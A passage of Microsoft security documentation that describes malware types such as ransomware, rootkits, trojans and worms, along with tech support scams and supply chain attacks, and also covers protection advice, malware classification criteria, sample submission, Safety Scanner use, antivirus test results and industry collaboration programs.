[email protected]. For more information on submitting messages to Microsoft, see Submit spam,
non-spam, and phishing scam messages to Microsoft for analysis.
For Outlook and Outlook on the web users, use the Report Message Add-in for Microsoft Outlook. For
information about how to install and use this tool, see Enable the Report Message add-in.
Send an email with the phishing scam to The Anti-Phishing Working Group: [email protected]. The
group uses reports generated from emails sent to fight phishing scams and hackers. ISPs, security vendors,
financial institutions and law enforcement agencies are involved.
Where to find more information about phishing attacks

For information on the latest Phishing attacks, techniques, and trends, you can read these entries on the Windows
Security blog:
Phishers unleash simple but effective social engineering techniques using PDF attachments
Tax themed phishing and malware attacks proliferate during the tax filing season
Phishing like emails lead to tech support scam
Ransomware
Ransomware is a type of malware that encrypts files and folders, preventing access to important files.
Ransomware attempts to extort money from victims by asking for money, usually in form of cryptocurrencies, in
exchange for the decryption key. But cybercriminals won't always follow through and unlock the files they
encrypted.
The trend towards increasingly sophisticated malware behavior, highlighted by the use of exploits and other attack
vectors, makes older platforms especially susceptible to ransomware attacks.
How ransomware works

Most ransomware infections start with:
Email messages with attachments that try to install ransomware.
Websites hosting exploit kits that attempt to use vulnerabilities in web browsers and other software to
install ransomware.
Once ransomware infects a device, it starts encrypting files, folders, entire hard drive partitions using encryption
algorithms like RSA or RC4.
Ransomware is one of the most lucrative revenue channels for cybercriminals, so malware authors continually
improve their malware code to better target enterprise environments. Ransomware-as-a-service is a cybercriminal
business model in which malware creators sell their ransomware and other services to cybercriminals, who then
operate the ransomware attacks. The business model also defines profit sharing between the malware creators,
ransomware operators, and other parties that may be involved. For cybercriminals, ransomware is a big business,
at the expense of individuals and businesses.
Examples
Sophisticated ransomware like Spora, WannaCrypt (also known as WannaCry), and Petya (also known as
NotPetya) spread to other computers via network shares or exploits.
Spora drops ransomware copies in network shares.
WannaCrypt exploits the Server Message Block (SMB ) vulnerability CVE -2017-0144 (also called
EternalBlue) to infect other computers.
A Petya variant exploits the same vulnerability, in addition to CVE -2017-0145 (also known as
EternalRomance), and uses stolen credentials to move laterally across networks.
Older ransomware like Reveton locks screens instead of encrypting files. They display a full screen image and
then disable Task Manager. The files are safe, but they are effectively inaccessible. The image usually contains a
message claiming to be from law enforcement that says the computer has been used in illegal cybercriminal
activities and fine needs to be paid. Because of this, Reveton is nicknamed "Police Trojan" or "Police ransomware".
Ransomware like Cerber and Locky search for and encrypt specific file types, typically document and media files.
When the encryption is complete, the malware leaves a ransom note using text, image, or an HTML file with
instructions to pay a ransom to recover files.
Bad Rabbit ransomware was discovered attempting to spread across networks using hardcoded usernames and
passwords in brute force attacks.
How to protect against ransomware
Organizations can be targeted specifically by attackers, or they can be caught in the wide net cast by cybercriminal
operations. Large organizations are high value targets and attackers can demand bigger ransoms.
We recommend:
Back up important files regularly. Use the 3-2-1 rule. Keep three backups of your data, on two different
storage types, and at least one backup offsite.
Apply the latest updates to your operating systems and apps.
Educate your employees so they can identify social engineering and spear-phishing attacks.
Controlled folder access. It can stop ransomware from encrypting files and holding the files for ransom.
Rootkits
Malware authors use rootkits to hide malware on your device, allowing malware to persist as long as possible. A
successful rootkit can potentially remain in place for years if it is undetected. During this time it will steal
information and resources.
How rootkits work

Rootkits intercept and change standard operating system processes. After a rootkit infects a device, you can’t trust
any information that device reports about itself.
For example, if you were to ask a device to list all of the programs that are running, the rootkit might stealthily
remove any programs it doesn’t want you to know about. Rootkits are all about hiding things. They want to hide
both themselves and their malicious activity on a device.
Many modern malware families use rootkits to try and avoid detection and removal, including:
Alureon
Cutwail
Datrahere (Zacinlo)
Rustock
Sinowal
Sirefef
How to protect against rootkits

Like any other type of malware, the best way to avoid rootkits is to prevent it from being installed in the first place.
Apply the latest updates to operating systems and apps.
Educate your employees so they can be wary of suspicious websites and emails.
Back up important files regularly. Use the 3-2-1 rule. Keep three backups of your data, on two different
storage types, and at least one backup offsite.
What if I think I have a rootkit on my device?
Microsoft security software includes a number of technologies designed specifically to remove rootkits. If you think
you might have a rootkit on your device and your antimalware software isn’t detecting it, you might need an extra
tool that lets you boot to a known trusted environment.
Windows Defender Offline can be launched from Windows Security Center and has the latest anti-malware
updates from Microsoft. It’s designed to be used on devices that aren't working correctly due to a possible
malware infection.
System Guard in Windows 10 protects against rootkits and threats that impact system integrity.
What if I can’t remove a rootkit?
If the problem persists, we strongly recommend reinstalling the operating system and security software. You
should then restore your data from a backup.
Supply chain attacks are an emerging kind of threat that target software developers and suppliers. The goal is to
access source codes, build processes, or update mechanisms by infecting legitimate apps to distribute malware.
How supply chain attacks work

Attackers hunt for unsecure network protocols, unprotected server infrastructures, and unsafe coding practices.
They break in, change source codes, and hide malware in build and update processes.
Because software is built and released by trusted vendors, these apps and updates are signed and certified. In
software supply chain attacks, vendors are likely unaware that their apps or updates are infected with malicious
code when they’re released to the public. The malicious code then runs with the same trust and permissions as the
app.
The number of potential victims is significant, given the popularity of some apps. A case occurred where a free file
compression app was poisoned and deployed to customers in a country where it was the top utility app.
Types of supply chain attacks
Compromised software building tools or updated infrastructure
Stolen code-sign certificates or signed malicious apps using the identity of dev company
Compromised specialized code shipped into hardware or firmware components
Pre-installed malware on devices (cameras, USB, phones, etc.)
To learn more about supply chain attacks, read this blog post called attack inception: compromised supply chain
within a supply chain poses new risks.
How to protect against supply chain attacks

Deploy strong code integrity policies to allow only authorized apps to run.
Use endpoint detection and response solutions that can automatically detect and remediate suspicious
activities.
For software vendors and developers
Maintain a highly secure build and update infrastructure.
Immediately apply security patches for OS and software.
Implement mandatory integrity controls to ensure only trusted tools run.
Require multi-factor authentication for admins.
Build secure software updaters as part of the software development lifecycle.
Require SSL for update channels and implement certificate pinning.
Sign everything, including configuration files, scripts, XML files, and packages.
Check for digital signatures, and don’t let the software updater accept generic input and commands.
Develop an incident response process for supply chain attacks.
Disclose supply chain incidents and notify customers with accurate and timely information
For more general tips on protecting your systems and devices, see prevent malware infection.
Tech support scams
Tech support scams are an industry-wide issue where scammers use scare tactics to trick users into paying for
unnecessary technical support services that supposedly fix contrived device, platform, or software problems.
How tech support scams work

Scammers may call you directly on your phone and pretend to be representatives of a software company. They
might even spoof the caller ID so that it displays a legitimate support phone number from a trusted company.
They can then ask you to install applications that give them remote access to your device. Using remote access,
these experienced scammers can misrepresent normal system output as signs of problems.
Scammers might also initiate contact by displaying fake error messages on websites you visit, displaying support
numbers and enticing you to call. They can also put your browser on full screen and display pop-up messages that
won't go away, essentially locking your browser. These fake error messages aim to trick you into calling an
indicated technical support hotline. Note that Microsoft error and warning messages never include phone
numbers.
When you engage with the scammers, they can offer fake solutions for your “problems” and ask for payment in
the form of a one-time fee or subscription to a purported support service.
For more information, view known tech support scam numbers and popular web scams.
How to protect against tech support scams

Share and implement the general tips on how to prevent malware infection.
It is also important to keep the following in mind:
Microsoft does not send unsolicited email messages or make unsolicited phone calls to request personal or
financial information, or to fix your computer.
Any communication with Microsoft has to be initiated by you.
Don’t call the number in the pop-ups. Microsoft’s error and warning messages never include a phone
number.
Download software only from official vendor websites or the Microsoft Store. Be wary of downloading
software from third-party sites, as some of them might have been modified without the author’s knowledge
to bundle support scam malware and other threats.
Use Microsoft Edge when browsing the internet. It blocks known support scam sites using Windows
Defender SmartScreen (which is also used by Internet Explorer). Furthermore, Microsoft Edge can stop
pop-up dialogue loops used by these sites.
Enable Windows Defender Antivirus in Windows 10. It detects and removes known support scam malware.
What to do if information has been given to a tech support person

Uninstall applications that scammers asked to be install. If access has been granted, consider resetting the
device
Run a full scan with Windows Defender Antivirus to remove any malware. Apply all security updates as
soon as they are available.
Change passwords.
Call your credit card provider to reverse the charges, if you have already paid.
Monitor anomalous logon activity. Use Windows Defender Firewall to block traffic to services that you
would not normally access.
Reporting tech support scams
Help Microsoft stop scammers, whether they claim to be from Microsoft or from another tech company, by
reporting tech support scams:
www.microsoft.com/reportascam
You can also report any unsafe website that you suspect is a phishing website or contains malicious content
directly to Microsoft by filling out a Report an unsafe site form or using built in web browser functionality.
Trojans
Trojans are a common type of malware which, unlike viruses, can’t spread on their own. This means they either
have to be downloaded manually or another malware needs to download and install them.
Trojans often use the same file names as real and legitimate apps. It is easy to accidentally download a trojan
thinking that it is a legitimate app.
How trojans work

Trojans can come in many different varieties, but generally they do the following:
Download and install other malware, such as viruses or worms.
Use the infected device for click fraud.
Record keystrokes and websites visited.
Send information about the infected device to a malicious hacker including passwords, login details for
websites, and browsing history.
Give a malicious hacker control over the infected device.
How to protect against trojans

Use the following free Microsoft software to detect and remove it:
Windows Defender Antivirus for Windows 10 and Windows 8.1, or Microsoft Security Essentials for
previous versions of Windows.
Microsoft Safety Scanner
Unwanted software
Unwanted software are programs that alter the Windows experience without your consent or control. This can take
the form of modified browsing experience, lack of control over downloads and installation, misleading messages,
or unauthorized changes to Windows settings.
How unwanted software works

Unwanted software can be introduced when a user searches for and downloads applications from the internet.
Some applications are software bundlers, which means that they are packed with other applications. As a result,
other programs can be inadvertently installed when the original application is downloaded.
Here are some indications of unwanted software:
There are programs that you did not install and that may be difficult to uninstall
Browser features or settings have changed, and you can’t view or modify them
There are excessive messages about your device's health or about files and programs
There are ads that cannot be easily closed
Some indicators are harder to recognize because they are less disruptive, but are still unwanted. For example,
unwanted software can modify web pages to display specific ads, monitor browsing activities, or remove control of
the browser.
Microsoft uses an extensive evaluation criteria to identify unwanted software.
How to protect against unwanted software

To prevent unwanted software infection, download software only from official websites, or from the Microsoft
Store. Be wary of downloading software from third-party sites.
Use Microsoft Edge when browsing the internet. Microsoft Edge includes additional protections that effectively
block browser modifiers that can change your browser settings. Microsoft Edge also blocks known websites
hosting unwanted software using SmartScreen (also used by Internet Explorer).
Enable Windows Defender AV in Windows 10. It provides real-time protection against threats and detects and
removes known unwanted software.
Download Microsoft Security Essentials for real-time protection in Windows 7 or Windows Vista.
What should I do if my device is infected?
If you suspect that you have unwanted software, you can submit files for analysis.
Some unwanted software adds uninstallation entries, which means that you can remove them using Settings.
1. Select the Start button
2. Go to Settings > Apps > Apps & features.
3. Select the app you want to uninstall, then click Uninstall.
If you only recently noticed symptoms of unwanted software infection, consider sorting the apps by install date,
and then uninstall the most recent apps that you did not install.
You may also need to remove browser add-ons in your browsers, such as Internet Explorer, Firefox, or Chrome.
Worms
A worm is a type of malware that can copy itself and often spreads through a network by exploiting security
vulnerabilities. It can spread through email attachments, text messages, file-sharing programs, social networking
sites, network shares, removable drives, and software vulnerabilities.
How worms work

Worms represent a large category of malware. Different worms use different methods to infect devices.
Depending on the variant, they can steal sensitive information, change security settings, send information to
malicious hackers, stop users from accessing files, and other malicious activities.
Jenxcus (also known as Dunihi), Gamarue (also known as Androm), and Bondat have consistently remained at the
top of the list of malware that infect users running Microsoft security software. Although these worms share some
commonalities, it is interesting to note that they also have distinct characteristics.
Jenxcus has capabilities of not only infecting removable drives but can also act as a backdoor that connects
back to its server. This threat typically gets into a device from a drive-by download attack, meaning it's
installed when users just visit a compromised web page.
Gamarue typically arrives through spam campaigns, exploits, downloaders, social networking sites, and
removable drives. When Gamarue infects a device, it becomes a distribution channel for other malware.
We’ve seen it distribute other malware such as infostealers, spammers, clickers, downloaders, and rogues.
Bondat typically arrives through fictitious Nullsoft Scriptable Install System (NSIS ), Java installers, and
removable drives. When Bondat infects a system, it gathers information about the machine such as device
name, Globally Unique Identifier (GUID ), and OS build. It then sends that information to a remote server.
Both Bondat and Gamarue have clever ways of obscuring themselves to evade detection. By hiding what they are
doing, they try to avoid detection by security software.
WannaCrypt also deserves a mention here. Unlike older worms that often spread just because they could,
modern worms often spread to drop a payload (e.g. ransomware).
This image shows how a worm can quickly spread through a shared USB drive.
Figure worm spreading from a shared USB drive
How to protect against worms
Enable Windows Defender AV in Windows 10. It provides real-time protection against threats and detects and
removes known unwanted software.
Download Microsoft Security Essentials for real-time protection in Windows 7 or Windows Vista.
How Microsoft identifies malware and potentially
unwanted applications
Microsoft aims to provide customers with the most delightful and productive Windows experience possible. To
help achieve that, we try our best to ensure our customers are safe and in control of their devices.
Microsoft gives you the information and tools you need when downloading, installing, and running software, as
well as tools that protect you when we know that something unsafe is happening. Microsoft does this by
identifying and analyzing software and online content against criteria described in this article.
You can participate in this process by submitting software for analysis. Our analysts and intelligent systems can
then help identify undesirable software and ensure they are covered by our security solutions.
Because new forms of malware and potentially unwanted applications are being developed and distributed rapidly,
Microsoft reserves the right to adjust, expand, and update these criteria without prior notice or announcements.
Malware
Malware is the overarching name for applications and other code, i.e. software, that Microsoft classifies more
granularly as malicious software or unwanted software.
Malicious software
Malicious software is an application or code that compromises user security. Malicious software might steal your
personal information, lock your PC until you pay a ransom, use your PC to send spam, or download other
malicious software. In general, malicious software tricks, cheats, or defrauds users, places users in vulnerable
states, or performs other malicious activities.
Microsoft classifies most malicious software into one of the following categories:
Backdoor: A type of malware that gives malicious hackers remote access to and control of your PC.
Downloader: A type of malware that downloads other malware onto your PC. It needs to connect to the
internet to download files.
Dropper: A type of malware that installs other malware files onto your PC.Unlike a downloader, a dropper
doesn’t need to connect to the internet to drop malicious files. The dropped files are typically embedded in
the dropper itself.
Exploit: A piece of code that uses software vulnerabilities to gain access to your PC and perform other
tasks, such as installing malware. See more information about exploits.
Hacktool: A type of tool that can be used to gain unauthorized access to your PC.
Macro virus: A type of malware that spreads through infected documents, such as Microsoft Word or Excel
documents. The virus is run when you open an infected document.
Obfuscator: A type of malware that hides its code and purpose, making it more difficult for security
software to detect or remove.
Password stealer: A type of malware that gathers your personal information, such as user names and
passwords. It often works along with a keylogger, which collects and sends information about the keys you
press and websites you visit.
Ransomware: A type of malware that encrypts your files or makes other modifications that can prevent
you from using your PC. It then displays a ransom note stating you must pay money, complete surveys, or
perform other actions before you can use your PC again. See more information about ransomware.
Rogue security software: Malware that pretends to be security software but doesn't provide any
protection. This type of malware usually displays alerts about nonexistent threats on your PC. It also tries to
convince you to pay for its services.
Trojan: A type of malware that attempts to appear harmless. Unlike a virus or a worm, a trojan doesn't
spread by itself. Instead it tries to look legitimate, tricking users into downloading and installing it. Once
installed, trojans perform a variety of malicious activities, such as stealing personal information,
downloading other malware, or giving attackers access to your PC.
Trojan clicker: A type of trojan that automatically clicks buttons or similar controls on websites or
applications. Attackers can use this trojan to click on online advertisements. These clicks can skew online
polls or other tracking systems and can even install applications on your PC.
Worm: A type of malware that spreads to other PCs. Worms can spread through email, instant messaging,
file sharing platforms, social networks, network shares, and removable drives. Sophisticated worms take
advantage of software vulnerabilities to propagate.
Unwanted software
Microsoft believes that you should have control over your Windows experience. Software running on Windows
should keep you in control of your PC through informed choices and accessible controls. Microsoft identifies
software behaviors that ensure you stay in control. We classify software that does not fully demonstrate these
behaviors as "unwanted software".
Lack of choice
You must be notified about what is happening on your PC, including what software does and whether it is active.
Software that exhibits lack of choice might:
Fail to provide prominent notice about the behavior of the software and its purpose and intent.
Fail to clearly indicate when the software is active and might also attempt to hide or disguise its presence.
Install, reinstall, or remove software without your permission, interaction, or consent.
Install other software without a clear indication of its relationship to the primary software.
Circumvent user consent dialogs from the browser or operating system.
Falsely claim to be software from Microsoft.
Software must not mislead or coerce you into making decisions about your PC. This is considered behavior that
limits your choices. In addition to the previous list, software that exhibits lack of choice might:
Display exaggerated claims about your PC’s health.
Make misleading or inaccurate claims about files, registry entries, or other items on your PC.
Display claims in an alarming manner about your PC's health and require payment or certain actions in
exchange for fixing the purported issues.
Software that stores or transmits your activities or data must:
Give you notice and get consent to do so. Software should not include an option that configures it to hide
activities associated with storing or transmitting your data.
Lack of control
You must be able to control software on your computer. You must be able to start, stop, or otherwise revoke
authorization to software.
Software that exhibits lack of control might:
Prevent or limit you from viewing or modifying browser features or settings.
Open browser windows without authorization.
Redirect web traffic without giving notice and getting consent.
Modify or manipulate webpage content without your consent.
Software that changes your browsing experience must only use the browser's supported extensibility model for
installation, execution, disabling, or removal. Browsers that do not provide supported extensibility models will be
considered non-extensible and should not be modified.
Installation and removal
You must be able to start, stop, or otherwise revoke authorization given to software. Software should obtain your
consent before installing, and it must provide a clear and straightforward way for you to install, uninstall, or
disable it.
Software that delivers poor installation experience might bundle or download other "unwanted software" as
classified by Microsoft.
Software that delivers poor removal experience might:
Present confusing or misleading prompts or pop-ups while being uninstalled.
Fail to use standard install/uninstall features, such as Add/Remove Programs.
Advertising and advertisements
Software that promotes a product or service outside of the software itself can interfere with your computing
experience. You should have clear choice and control when installing software that presents advertisements.
The advertisements that are presented by software must:
Include an obvious way for users to close the advertisement. The act of closing the advertisement must not
open another advertisement.
Include the name of the software that presented the advertisement.
The software that presents these advertisements must:
Provide a standard uninstall method for the software using the same name as shown in the advertisement it
presents.
Advertisements shown to you must:
Be distinguishable from website content.
Not mislead, deceive, or confuse.
Not contain malicious code.
Not invoke a file download.
Consumer opinion
Microsoft maintains a worldwide network of analysts and intelligence systems where you can submit software for
analysis. Your participation helps us identify new malware quickly. After analysis, Microsoft creates Security
intelligence for software that meets the described criteria. This Security intelligence identifies the software as
malware and are available to all users through Windows Defender Antivirus and other Microsoft antimalware
solutions.
Potentially unwanted application (PUA)
Our PUA protection aims to safeguard user productivity and ensure enjoyable Windows experiences. This optional
protection, available to enterprises, helps deliver more productive, performant, and delightful Windows
experiences.
PUAs are not considered malware.
Microsoft uses specific categories and the category definitions to classify software as a PUA.
Advertising software: Software that displays advertisements or promotions, or prompts the user to
complete surveys for other products or services in software other than itself. This includes software that
inserts advertisements to webpages.
Torrent software: Software that is used to create or download torrents or other files specifically used with
peer-to-peer file-sharing technologies.
Cryptomining software: Software that uses your computer resources to mine cryptocurrencies.
Bundling software: Software that offers to install other software that is not digitally signed by the same
entity. Also, software that offers to install other software that qualify as PUA based on the criteria outlined in
this document.
Marketing software: Software that monitors and transmits the activities of the user to applications or
services other than itself for marketing research.
Evasion software: Software that actively tries to evade detection by security products, including software
that behaves differently in the presence of security products.
Poor industry reputation: Software that trusted security providers detect with their security products. The
security industry is dedicated to protecting customers and improving their experiences. Microsoft and other
organizations in the security industry continuously exchange knowledge about files we have analyzed to
provide users with the best possible protection.
If you have a file that you suspect might be malware or is being incorrectly detected, you can submit it to us for
analysis. This page has answers to some common questions about submitting a file for analysis.
How do I send a malware file to Microsoft?

You can send us files that you think might be malware or files that have been incorrectly detected through the
sample submission portal.
We receive a large number of samples from many sources. Our analysis is prioritized by the number of file
detections and the type of submission. You can help us complete a quick analysis by providing detailed information
about the product you were using and what you were doing when you found the file.
If you sign in before you submit a sample, you will be able to track your submissions.
Can I send a sample by email?

No, we only accept submissions through our sample submission portal.
Can I submit a sample without signing in?

Yes, you many submit a file as an anonymous home customer. You will get a link to a webpage where you can view
the status of the submission.
If you're an enterprise customer, you need to sign in so that we can prioritize your submission appropriately. If you
are currently experiencing a virus outbreak or security-related incident, you should contact your designated
Microsoft support professional or go to Microsoft Support for immediate assistance.
What is the Software Assurance ID (SAID)?

The Software Assurance ID (SAID ) is for enterprise customers to track support entitlements. The submission
portal accepts and retains SAID information and allows customers with valid SAIDs to make higher priority
submissions.
How do I dispute the detection of my program?
Submit the file in question as a software developer. Wait until your submission has a final determination.
If you’re not satisfied with our determination of the submission, use the developer contact form provided with the
submission results to reach Microsoft. We will use the information you provide to investigate further if necessary.
We encourage all software vendors and developers to read about how Microsoft identifies malware and unwanted
software.
How do I track or view past sample submissions?

You can track your submissions through the submission history page. Your submission will only appear on this
page if you were signed in when you submitted it.
If you’re not signed in when you submit a sample, you will be redirected to a tracking page. Bookmark this page if
you want to come back and check on the status of your submission.
What does the submission status mean?
Each submission is shown to be in one of the following status types:
Submitted—the file has been received
In progress—an analyst has started checking the file
Closed—a final determination has been given by an analyst
If you are signed in, you can see the status of any files you submit to us on the submission history page.
How does Microsoft prioritize submissions

Processing submissions take dedicated analyst resource. Because we regularly receive a large number of
submissions, we handle them based on a priority. The following factors affect how we prioritize submissions:
Prevalent files with the potential to impact large numbers of computers are prioritized.
Authenticated customers, especially enterprise customers with valid Software Assurance IDs (SAIDs), are
given priority.
Submissions flagged as high priority by SAID holders are given immediate attention.
Your submission is immediately scanned by our systems to give you the latest determination even before an
analyst starts handling your case. Note that the same file may have already been processed by an analyst. To check
for updates to the determination, select rescan on the submission details page.
Microsoft Safety Scanner
Microsoft Safety Scanner is a scan tool designed to find and remove malware from Windows computers. Simply
download it and run a scan to find malware and try to reverse changes made by identified threats.
Download Microsoft Safety Scanner (32-bit)
Download Microsoft Safety Scanner (64-bit)
NOTE The security intelligence update version of the Microsoft Safety Scaner matches the version described
in this web page.
Safety Scanner only scans when manually triggered and is available for use 10 days after being downloaded. We
recommend that you always download the latest version of this tool before each scan.
NOTE: This tool does not replace your antimalware product. For real-time protection with automatic updates,
use Windows Defender Antivirus on Windows 10 and Windows 8 or Microsoft Security Essentials on
Windows 7. These antimalware products also provide powerful malware removal capabilities. If you are
having difficulties removing malware with these products, you can refer to our help on removing difficult
threats.
NOTE: Safety scanner is a portable executable and does not appear in the Windows Start menu or as an icon
on the desktop. Note where you saved this download.
System requirements
Safety Scanner helps remove malicious software from computers running Windows 10, Windows 10 Tech
Preview, Windows 8.1, Windows 8, Windows 7, Windows Server 2016, Windows Server Tech Preview, Windows
Server 2012 R2, Windows Server 2012, Windows Server 2008 R2, or Windows Server 2008. Please refer to the
Microsoft Lifecycle Policy.
How to run a scan

1. Download this tool and open it.
2. Select the type of scan you want run and start the scan.
3. Review the scan results displayed on screen. For detailed detection results, view the log at
%SYSTEMROOT%\debug\msert.log.
To remove this tool, delete the executable file (msert.exe by default).
For more information about the Safety Scanner, see the support article on how to troubleshoot problems using
Safety Scanner.
Related resources
Troubleshooting Safety Scanner
Windows Defender Antivirus
Microsoft Security Essentials
Removing difficult threats
Submit file for malware analysis
Microsoft antimalware and threat protection solutions
Top scoring in industry tests
Windows Defender Advanced Threat Protection (Windows Defender ATP ) technologies consistently achieve high
scores in independent tests, demonstrating the strength of its enterprise threat protection capabilities. Microsoft
aims to be transparent about these test scores. This page summarizes the results and provides analysis.
Endpoint detection & response

Windows Defender ATP endpoint detection and response capabilities provide advanced attack detections that are
near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a
breach, and take response actions to remediate threats.
MITRE: Industry-leading optics and detection capabilities
MITRE tested the ability of products to detect techniques commonly used by the targeted attack group APT3 (also
known as Boron or UPS ). To isolate detection capabilities, all protection and prevention features were turned off.
Microsoft is happy to be one of the first EDR vendors to sign up for the MITRE evaluation based on the ATT&CK
framework, widely regarded today as the most comprehensive catalog of attacker techniques and tactics.
ATT&CK-based evaluation: Leading optics and detection capabilities | Analysis
Windows Defender ATP delivered comprehensive coverage of attacker techniques across the entire attack
chain. Highlights included the breadth of telemetry, the strength of threat intelligence, and the advanced,
automatic detection through machine learning, heuristics, and behavior monitoring.
Next generation protection

Windows Defender Antivirus consistently performs highly in independent tests, displaying how it is a top choice in
the antivirus market. Note that these tests only provide results for antivirus and do not test for additional security
protections.
Windows Defender Antivirus is part of the next generation Window Defender ATP security stack which addresses
the latest and most sophisticated threats today. In some cases, customers might not even know they were protected
because a cyberattack is stopped milliseconds after a campaign starts. That's because Windows Defender Antivirus
detects and stops malware at first sight by using machine learning, artificial intelligence, behavioral analysis, and
other advanced technologies.
AV -TEST: Protection score of 6.0/6.0 in the latest test
The AV -TEST Product Review and Certification Report tests on three categories: protection, performance, and
usability. The scores listed below are for the Protection category which has two scores: Real-World Testing and the
AV -TEST reference set (known as "Prevalent Malware").
January - February 2019 AV -TEST Business User test: Protection score 6.0/6.0 Latest
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, with 19,956 malware samples
used. This is the fifth consecutive cycle that Windows Defender Antivirus achieved a perfect score.
November - December 2018 AV -TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, detecting 100% of 19,956
malware samples.
September - October 2018 AV -TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, protecting against 21,566 of
21,568 tested malware samples.
July - August 2018 AV -TEST Business User test: Protection score 6.0/6.0 | Analysis
malware samples.
May - June 2018 AV -TEST Business User test: Protection score 6.0/6.0 | Analysis
malware samples.
March - April 2018 AV -TEST Business User test: Protection score 5.5/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 5.5/6.0, missing 2 out of 5,680
malware samples (0.035% miss rate).
January - February 2018 AV -TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, with 5,105 malware samples
tested.
AV -Comparatives: Protection rating of 99.6% in the latest test

AV -Comparatives is an independent organization offering systematic testing for security software such as PC/Mac-
based antivirus products and mobile security solutions.
Real-World Protection Test Enterprise August - November 2018: Protection Rate 99.6% Latest
This test, as defined by AV -Comparatives, attempts to assess the effectiveness of each security program to
protect a computer against active malware threats while online. The test set contained 1207 test cases (such
as malicious URLs).
Malware Protection Test Enterprise August 2018: Protection Rate 99.9%
This test, as defined by AV -Comparatives, attempts to assesses a security program’s ability to protect a
system against infection by malicious files before, during or after execution. The results are based on testing
against 1,556 malware samples.
Real-World Protection Test Enterprise March - June 2018: Protection Rate 98.7%
The test set contained 1,163 test cases (such as malicious URLs).
Malware Protection Test Enterprise March 2018: Protection Rate 99.9%
For this test, 1,470 recent malware samples were used.
Historical AV -Comparatives Microsoft tests
SE Labs: Total accuracy rating of AAA in the latest test
SE Labs tests a range of solutions used by products and services to detect and/or protect against attacks, including
endpoint software, network appliances, and cloud services.
Enterprise Endpoint Protection October - December 2018: AAA award pdf
Microsoft's next-gen protection was named as one of the leading products, stopping all of the public and
targeted attacks.
Enterprise Endpoint Protection July - September 2018: AAA award pdf
Microsoft's next-gen protection was named as one of the most effective products, stopping all public and
targeted attacks. It showcased its ability to block malicious URLs, deal with exploits, and classify legitimate
apps and websites correctly.
Enterprise Endpoint Protection April - June 2018: AAA award pdf
Microsoft's next-gen protection was named as one of the most effective products, stopping all targeted
attacks and the vast majority of public threats.
To what extent are tests representative of protection in the real world?

It is important to remember that Microsoft sees a wider and broader set of threats beyond what’s tested in the
evaluations highlighted above. For example, in an average month, we identify over 100 million new threats. Even if
an independent tester can acquire and test 1% of those threats, that is a million tests across 20 or 30 products. In
other words, the vastness of the malware landscape makes it extremely difficult to evaluate the quality of protection
against real world threats.
The capabilities within Windows Defender ATP provide additional layers of protection that are not factored into
industry tests, and address some of the latest and most sophisticated threats. Isolating AV from the rest of
Windows Defender ATP creates a partial picture of how our security stack operates in the real world. For example,
attack surface reduction and endpoint detection & response capabilities can help prevent malware from getting
onto devices in the first place. We have proven that Windows Defender ATP components catch samples that
Windows Defender Antivirus missed in these industry tests, which is more representative of how effectively our
security suite protects customers in the real world.
Using independent tests, customers can view one aspect of their security suite but can't assess the complete
protection of all the security features. Microsoft is highly engaged in working with several independent testers to
evolve security testing to focus on the end-to-end security stack. In the meantime, customers can evaluate
Windows Defender Advanced Threat Protection in their own networks by signing up for a 90-day trial of Windows
Defender ATP, or enabling Preview features on existing tenants.
Industry collaboration programs
Microsoft has several industry-wide collaboration programs with different objectives and requirements. Enrolling
in the right program can help you protect your customers, gain more insight into the current threat landscape, or
assist in disrupting the malware ecosystem.
Virus Information Alliance (VIA)

The VIA program gives members access to information that will help improve protection for Microsoft customers.
Malware telemetry and samples can be provided to security teams to help identify gaps in their protection,
prioritize new threat coverage, or better respond to threats.
You must be a member of VIA if you want to apply for membership to the other programs.
Go to the VIA program page for more information.
Microsoft Virus Initiative (MVI)

MVI is open to organizations who build and own a Real Time Protection (RTP ) antimalware product of their own
design, or one developed using a third-party antivirus SDK.
Members get access to Microsoft client APIs for the Windows Defender Security Center, IOAV, AMSI, and Cloud
Files, along with health data and other telemetry to help their customers stay protected. Antimalware products are
submitted to Microsoft for performance testing on a regular basis.
Go to the MVI program page for more information.
Coordinated Malware Eradication (CME)

CME is open to organizations who are involved in cybersecurity and antimalware or interested in fighting
cybercrime.
The program aims to bring organizations in cybersecurity and other industries together to pool tools, information
and actions to drive coordinated campaigns against malware. The ultimate goal is to create efficient and long-
lasting results for better protection of our collective communities, customers, and businesses.
Go to the CME program page for more information.
Virus Information Alliance
The Virus Information Alliance (VIA) is a public antimalware collaboration program for security software
providers, security service providers, antimalware testing organizations, and other organizations involved in
fighting cybercrime.
Members of the VIA program collaborate by exchanging technical information on malicious software with
Microsoft, with the goal of improving protection for Microsoft customers.
Better protection for customers against malware

The VIA program gives members access to information that will help improve protection for Microsoft customers.
For example, the program provides malware telemetry and samples to security product teams to identify gaps in
their protection and prioritize new threat coverage.
Malware prevalence data is provided to antimalware testers to assist them in selecting sample sets and setting
scoring criteria that represent the real-world threat landscape. Service organizations, such as a CERT, can leverage
our data to help assess the impact of policy changes or to help shut down malicious activity.
Microsoft is committed to continuous improvement to help reduce the impact of malware on customers. By
sharing malware-related information, Microsoft enables members of this community to work towards better
protection for customers.
Becoming a member of VIA

Microsoft has well-defined, objective, measurable, and tailored membership criteria for prospective members of
the Virus Information Alliance (VIA). The criteria is designed to ensure that Microsoft is able to work with security
software providers, security service providers, antimalware testing organizations, and other organizations involved
in the fight against cybercrime to protect a broad range of customers.
Members will receive information to facilitate effective malware detection, deterrence, and eradication. This
includes technical information on malware as well as metadata on malicious activity. Information shared through
VIA is governed by the VIA membership agreement and a Microsoft non-disclosure agreement, where applicable.
VIA has an open enrollment for potential members.
Initial selection criteria
To be eligible for VIA your organization must:
1. Be willing to sign a non-disclosure agreement with Microsoft.
2. Fit into one of the following categories:
Your organization develops antimalware technology that can run on Windows and your organization’s
product is commercially available.
Your organization provides security services to Microsoft customers or for Microsoft products.
Your organization publishes antimalware testing reports on a regular basis.
Your organization has a research or response team dedicated to fighting malware to protect your
organization, your customers, or the general public.
3. Be willing to sign and adhere to the VIA membership agreement.
If your organization meets these criteria and is interested in joining, apply for membership now. If you have
